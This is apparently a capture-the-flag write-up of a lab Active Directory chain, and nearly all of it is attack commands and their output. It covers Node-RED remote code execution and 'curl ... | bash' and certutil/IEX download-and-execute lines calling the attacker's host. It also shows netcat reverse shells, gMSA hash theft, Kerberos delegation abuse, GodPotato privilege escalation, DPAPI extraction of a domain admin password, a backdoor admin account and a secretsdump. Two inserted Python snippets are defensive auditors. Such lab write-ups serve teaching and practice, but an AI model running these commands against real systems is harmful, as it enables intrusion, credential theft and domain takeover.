vulnlab-tengu

A medium chain consisting of an Ubuntu VM (nodered), sql.tengu.vl and dc.tengu.vl, all domain joined.

noderedsh.py -> extract krb5.keytab -> read gMSA password -> constrained delegation -> log in with mssqlclient.py as the impersonated user -> read the domain admin password with SharpDPAPI

node-red exploit [initial access]

A web service named Node-RED runs on port 1880 and does not require authentication. We build a flow that executes a reverse shell on the target system:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 noderedsh.py http://10.10.139.247:1880
[+] Node-RED does not require authentication.
[+] Establishing RCE link ....
> whoami
nodered_svc
curl http://10.8.2.138/s.sh | bash


python3 -m http.server 80          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.139.247 - - [09/Aug/2024 14:21:42] "GET /s.sh HTTP/1.1" 200 -


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ nc -nlvp 9001       
listening on [any] 9001 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.139.247] 48442
sh: 0: can't access tty; job control turned off
$ whoami
nodered_svc
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
nodered_svc@nodered:/opt/nodered/.node-red$ export TERM=xterm
export TERM=xterm
nodered_svc@nodered:/opt/nodered/.node-red$ 
zsh: suspended  rlwrap nc -nlvp 443


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ stty raw -echo;fg
[1]  + continued  rlwrap nc -nlvp 443
nodered_svc@nodered:/opt/nodered/.node-red$ 
nodered_svc@nodered:/tmp$ wget http://10.8.2.138/chisel
nodered_svc@nodered:/tmp$ chmod +x chisel
nodered_svc@nodered:/tmp$ ./chisel client 10.8.2.138:8000 R:socks


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ chisel server -p 8000 --reverse 
2024/08/14 09:18:49 server: Reverse tunnelling enabled
2024/08/14 09:18:49 server: Fingerprint DGcMxm0MtWpKPEJ5EPKN8UyvmAiowDGpTHgWZHQCdOc=
2024/08/14 09:18:49 server: Listening on http://0.0.0.0:8000
2024/08/14 09:20:49 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains crackmapexec mssql sql.tengu.vl -u nodered_connector -p 'DreamPuppy<redacted25>' --local-auth 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:445  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [*] Windows Server 2022 Build 20348 (name:SQL) (domain:SQL)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  sql.tengu.vl:1433  ...  OK
MSSQL       sql.tengu.vl    1433   SQL              [+] nodered_connector:DreamPuppy<redacted>25 


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 sqsh -S 10.10.139.246 -U 'nodered_connector' -P 'DreamPuppy<redacted>25'  
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.139.246:1433  ...  OK
1> show databases;
2> use prod;
3> go
Msg 911, Level 16, State 1
Server 'SQL', Line 2
Database 'prod' does not exist. Make sure that the name is entered correctly.
1> select table_name from systable
2> go
Msg 208, Level 16, State 1
Server 'SQL', Line 1
Invalid object name 'systable'.
1> SELECT * FROM Dev.INFORMATION_SCHEMA.TABLES;
2> go -m vert
TABLE_CATALOG: Dev
TABLE_SCHEMA:  dbo
TABLE_NAME:    Task
TABLE_TYPE:    BASE TABLE
 
(1 row affected)
1> 

...
1> SELECT name FROM master.dbo.sysdatabases;
2> go -m vert
name: master
 
name: tempdb
 
name: model
 
name: msdb
 
name: Demo
 
name: Dev
 
(6 rows affected)
1> use Demo;
2> go
1> select * from users;
2> go -m vert
ID:       NULL
Username: t2_m.winters
Password: af9cfa9b70e5e90984203087e5a5219945a599abf31dd4bb2a11dc20678ea147
 
(1 row affected)
1> 


crackstation.net resolves this hash to Tengu123.

Checking credentials

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q crackmapexec ldap dc.tengu.nl -u 't2_m.winters' -p 'Tengu123'         
SMB         dc.tengu.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  DC.tengu.vl:389  ...  OK
LDAP        dc.tengu.nl     389    DC               [+] tengu.vl\t2_m.winters:Tengu123 

 

Getting krb5.keytab

As this box is domain joined, we can extract the machine account's NTLM hash from /etc/krb5.keytab using https://github.com/sosdave/KeyTabExtract:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ python3 keytabextract.py krb5.keytab
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
    REALM : TENGU.VL
    SERVICE PRINCIPAL : NODERED$/
    NTLM HASH : d4210ee2db0c03aa3611c9ef8a4dbf49
    AES-256 HASH : 4ce11c580289227f38f8cc0225456224941d525d1e525c353ea1e1ec83138096
    AES-128 HASH : 3e04b61b939f61018d2c27d4dc0b385f
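Added example (not from the original write-up or from KeyTabExtract): a minimal parser for the MIT keytab format that a defender can run over /etc/krb5.keytab to inventory which key types a domain-joined host stores. An rc4-hmac entry means the machine account's NT hash sits on disk in directly usable form, which is exactly what the tool above pulls out. The keytab bytes are constructed inline and the key bytes are dummy zeros; the audit function never returns key material.

```python
import struct
# Kerberos enctype numbers (RFC 3961/3962/4757).
ENCTYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}
WEAK_ENCTYPES = {23}  # an rc4-hmac keytab key is the account's raw NT hash

def _counted(buf, off):
    """Keytab counted octet string: 16-bit big-endian length, then bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    return buf[off + 2:off + 2 + n], off + 2 + n

def parse_keytab(data):
    """Parse an MIT-format keytab (version 0x0502) into a list of entry dicts."""
    if data[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version")
    off, entries = 2, []
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)
        off += 4
        if size < 0:                 # negative size marks a deleted slot
            off += -size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        realm, off = _counted(data, off + 2)
        comps = []
        for _ in range(ncomp):
            c, off = _counted(data, off)
            comps.append(c.decode())
        # 32-bit name type (0x0502 only), 32-bit timestamp, 8-bit kvno, 16-bit enctype
        name_type, timestamp, vno8, enctype = struct.unpack_from(">IIBH", data, off)
        key, off = _counted(data, off + 11)
        kvno = vno8
        if end - off >= 4:           # optional 32-bit kvno trailer overrides vno8
            (kvno,) = struct.unpack_from(">I", data, off)
        entries.append({"principal": "/".join(comps) + "@" + realm.decode(),
                        "kvno": kvno, "enctype": enctype, "key_len": len(key)})
        off = end
    return entries

def audit_keytab(data):
    """(principal, enctype name, is_weak) per key; key bytes are never returned."""
    return [(e["principal"], ENCTYPE_NAMES.get(e["enctype"], "enctype-%d" % e["enctype"]),
             e["enctype"] in WEAK_ENCTYPES) for e in parse_keytab(data)]

# Constructed sample keytab for NODERED$@TENGU.VL; key bytes are dummy zeros, not real keys.
def _entry(realm, comps, enctype, key, kvno=2):
    body = struct.pack(">HH", len(comps), len(realm)) + realm
    for c in comps:
        body += struct.pack(">H", len(c)) + c
    body += struct.pack(">IIBH", 1, 1723000000, kvno, enctype)  # KRB5_NT_PRINCIPAL = 1
    body += struct.pack(">H", len(key)) + key + struct.pack(">I", kvno)
    return struct.pack(">i", len(body)) + body

SAMPLE_KEYTAB = b"\x05\x02" + b"".join(_entry(b"TENGU.VL", [b"NODERED$"], et, bytes(n))
                                       for et, n in [(23, 16), (18, 32), (17, 16)])
```

Run `audit_keytab(open("/etc/krb5.keytab", "rb").read())` on a host to list its principals and flag rc4-hmac keys; on a real host the file is root-readable only, which is the control that failed here.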

 


 

proxychains4 bloodhound-python -d tengu.vl -c all -u t2_m.winters -p Tengu123 -ns 10.10.219.229 --dns-tcp --zip

In BloodHound we find that the machine account NODERED$ has the ReadGMSAPassword permission.

We can use netexec to retrieve the NTLM hash of the account gMSA01$:

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 netexec ldap dc.tengu.vl -u 'NODERED$' -H d4210ee2db0c03aa3611c9ef8a4dbf49 --gmsa 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:445  ...  OK
SMB         224.0.0.1       445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tengu.vl) (signing:True) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc.tengu.vl:636  ...  OK
LDAPS       224.0.0.1       636    DC               [+] tengu.vl\NODERED$:d4210ee2db0c03aa3611c9ef8a4dbf49 
LDAPS       224.0.0.1       636    DC               [*] Getting GMSA Passwords
LDAPS       224.0.0.1       636    DC               Account: gMSA01$              NTLM: d4b65861e85773fba2035b31ebcacb37
LDAPS       224.0.0.1       636    DC               Account: gMSA02$              NTLM: 

 

We notice that this account is allowed to delegate: gMSA01$ is configured for constrained delegation with protocol transition to the MSSQLSvc SPNs of sql.tengu.vl.

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-findDelegation 'tengu.vl/nodered$:@dc.tengu.vl' -hashes :d4210ee2db0c03aa3611c9ef8a4dbf49 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

AccountName  AccountType                          DelegationType                      DelegationRightsTo         
-----------  -----------------------------------  ----------------------------------  --------------------------
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/SQL:1433          
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl:1433 
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql.tengu.vl      
gMSA01$      ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  MSSQLSvc/sql               

In BloodHound we find a SQL_Admins group containing two users; next we try to impersonate one of them.
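Added example, not part of the original post or of impacket: the userAccountControl and msDS-AllowedToDelegateTo logic behind findDelegation's "Constrained w/ Protocol Transition" label, generalised to the other delegation types, plus a check of which users the KDC will refuse to impersonate via S4U2Proxy (Protected Users members, as noted at the end of the chain, and accounts flagged "sensitive and cannot be delegated"). The directory objects are constructed to mirror this chain, and a gMSA's msDS-GroupMSAMembership is assumed to be pre-resolved to principal names rather than the raw security descriptor.

```python
# userAccountControl bits (MS-ADTS) that drive Kerberos delegation behaviour.
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
NOT_DELEGATED = 0x100000                    # "account is sensitive and cannot be delegated"
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition (S4U2Self for any user)
WORKSTATION_TRUST_ACCOUNT = 0x1000          # set on computer and gMSA objects

def delegation_type(account):
    """Classify an account the way impacket's findDelegation labels it."""
    uac = account.get("userAccountControl", 0)
    targets = account.get("msDS-AllowedToDelegateTo", [])
    if uac & TRUSTED_FOR_DELEGATION:
        return "Unconstrained"
    if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "Constrained w/ Protocol Transition"
    if targets:
        return "Constrained"
    return None

def is_shielded(user, protected_users):
    """True if the KDC will not issue S4U2Proxy tickets in this user's name."""
    return (user["sAMAccountName"] in protected_users
            or bool(user.get("userAccountControl", 0) & NOT_DELEGATED))

def audit_delegation(accounts, users, protected_users):
    """One finding per delegating account: who can use it and whom it could impersonate."""
    shielded = sorted(u["sAMAccountName"] for u in users if is_shielded(u, protected_users))
    exposed = sorted(u["sAMAccountName"] for u in users if not is_shielded(u, protected_users))
    findings = []
    for acct in accounts:
        dtype = delegation_type(acct)
        if dtype is None:
            continue
        findings.append({
            "account": acct["sAMAccountName"], "type": dtype,
            "targets": list(acct.get("msDS-AllowedToDelegateTo", [])),
            # Assumption: msDS-GroupMSAMembership is pre-resolved to principal names.
            "password_readable_by": list(acct.get("msDS-GroupMSAMembership", [])),
            "impersonable": exposed, "shielded": shielded})
    return findings

# Constructed objects mirroring this chain; not pulled from a real directory.
ACCOUNTS = [
    {"sAMAccountName": "gMSA01$",
     "userAccountControl": WORKSTATION_TRUST_ACCOUNT | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["MSSQLSvc/SQL:1433", "MSSQLSvc/sql.tengu.vl:1433",
                                  "MSSQLSvc/sql.tengu.vl", "MSSQLSvc/sql"],
     "msDS-GroupMSAMembership": ["NODERED$"]},
    {"sAMAccountName": "gMSA02$", "userAccountControl": WORKSTATION_TRUST_ACCOUNT},
]
USERS = [
    {"sAMAccountName": "t1_m.winters", "userAccountControl": 0x200},  # NORMAL_ACCOUNT
    {"sAMAccountName": "T0_c.fowler", "userAccountControl": 0x200},
]
PROTECTED_USERS = {"T0_c.fowler"}  # Domain Admins are in Protected Users on this domain
```

The finding for gMSA01$ reproduces the findDelegation table above and shows the two fixes a defender has: remove the principals that can read the gMSA password, or put the accounts that must never be delegated into Protected Users / mark them NOT_DELEGATED.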

Getting the ticket

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 impacket-getST -spn 'MSSQLSvc/sql.tengu.vl' 'tengu.vl/GMSA01$@sql.tengu.vl' -hashes :d4b65861e85773fba2035b31ebcacb37 -dc-ip 10.10.185.21 -impersonate 't1_m.winters'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Impersonating t1_m.winters
[*] Requesting S4U2self
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Requesting S4U2Proxy
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.185.21:88  ...  OK
[*] Saving ticket in t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ export KRB5CCNAME=t1_m.winters@MSSQLSvc_sql.tengu.vl@TENGU.VL.ccache


┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ proxychains4 -q impacket-mssqlclient -k sql.tengu.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL): Line 1: Changed database context to 'master'.
[*] INFO(SQL): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232) 
[!] Press help for extra shell commands
SQL (TENGU\t1_m.winters  dbo@master)> 


SQL (TENGU\t1_m.winters  dbo@master)> xp_cmdshell powershell "cd ..\..; mkdir temp; cd C:\temp; certutil.exe -urlcache -f http://10.8.2.138/rcat_10.8.2.138_443.exe rcat_10.8.2.138_443.exe; .\rcat_10.8.2.138_443.exe"

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/tengu]
└─$ rlwrap nc -nlvp 443                                 
listening on [any] 443 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.185.22] 57071
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\temp> 


GodPotato on sql

PS C:\temp> ./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
./god.exe -cmd "powershell.exe -nop -w hidden -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://10.8.2.138:8080/rev.ps1');" 
[*] CombaseModule: 0x140723188531200
[*] DispatchTable: 0x140723191118152
[*] UseProtseqFunction: 0x140723190413536
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] Trigger RPCSS
[*] CreateNamedPipe \\.\pipe\1d5f2595-2789-449b-affd-92979c14b4c6\pipe\epmapper
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000b802-095c-ffff-21e6-2d89c9d2f435
[*] DCOM obj OXID: 0x3beb0139e85dbe21
[*] DCOM obj OID: 0x3a821b5f15430353
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 908 Token:0x764  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3888

Catch the shell as NT AUTHORITY\SYSTEM and add ourselves as local admin on sql.

But first, we find the credentials of the domain admin TENGU\T0_c.fowler.

Users may choose to save passwords in Windows by using an application or through the Credential Manager Control Panel applet. These credentials are stored on the hard disk drive and protected by using the Data Protection Application Programming Interface (DPAPI). Any program running as that user will be able to access credentials in this store.

PS C:\temp> wget http://10.8.2.138/sharp.exe -o sharp.exe
PS C:\temp> ./sharp.exe machinetriage /showall

  __                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.11.3                               


[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage

[*] Secret  : DPAPI_SYSTEM
[*]    full: C9C2333305555B68C729FD0938EE5DB5D2C8B33540B36F0AC59918C608686152CB7F09F74A22F544
[*]    m/u : C9C2333305555B68C729FD0938EE5DB5D2C8B335 / 40B36F0AC59918C608686152CB7F09F74A22F544


[*] SYSTEM master key cache:

{474602b3-bbd6-4a0e-9c1d-52aa0cb0a039}:BE80161FB9DADBFBF9620483D8BC4EF0BDB4B6F5
{7710e63f-a791-438b-8dfa-33f25aef47a8}:6466F58B69E7B437DBCC89D4CAEFEF7E84944CE7
{1415bc56-749a-4f03-8a8e-9fb9733359ab}:FBED03CA71C0CACACF43D8EB3F6D03ADB9C3198B
{236fb638-82cd-4a22-b9e7-6745744da5bd}:CD9A01A3056FC877EE9B343AC3BE584AB7DF4D86


[*] Triaging System Credentials


Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 67B6C9FA0475C51A637428875C335AAD

    guidMasterKey    : {1415bc56-749a-4f03-8a8e-9fb9733359ab}
    size             : 576
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 3/10/2024 2:49:34 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{3C0BC8C6-D88D-450C-803D-6A412D858CF2}
    TargetAlias      : 
    Comment          : 
    UserName         : TENGU\T0_c.fowler
    Credential       : Unt<redacted>y25

 


 

PS C:\temp> net user puck Password123! /add
The command completed successfully.

PS C:\temp> net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest                    
puck                     WDAGUtilityAccount       
The command completed with one or more errors.

PS C:\temp> net localgroup administrators puck /add
The command completed successfully.

Next, RDP to sql as puck:

proxychains xfreerdp /u:puck /p:'Password123!' /w:1566 /h:968 /v:10.10.141.134:3389

 

From there, start Active Directory Users and Computers as that user, add puck as a domain admin, then mstsc to dc.tengu.vl.

 

Finally, do a hashdump:

proxychains4 impacket-secretsdump 'tengu/puck:Password123!@dc.tengu.vl' > allhashes.txt

Because all Domain Admins are members of the group PROTECTED USERS@TENGU.VL, we can’t RDP in.

 

 

That was super fun
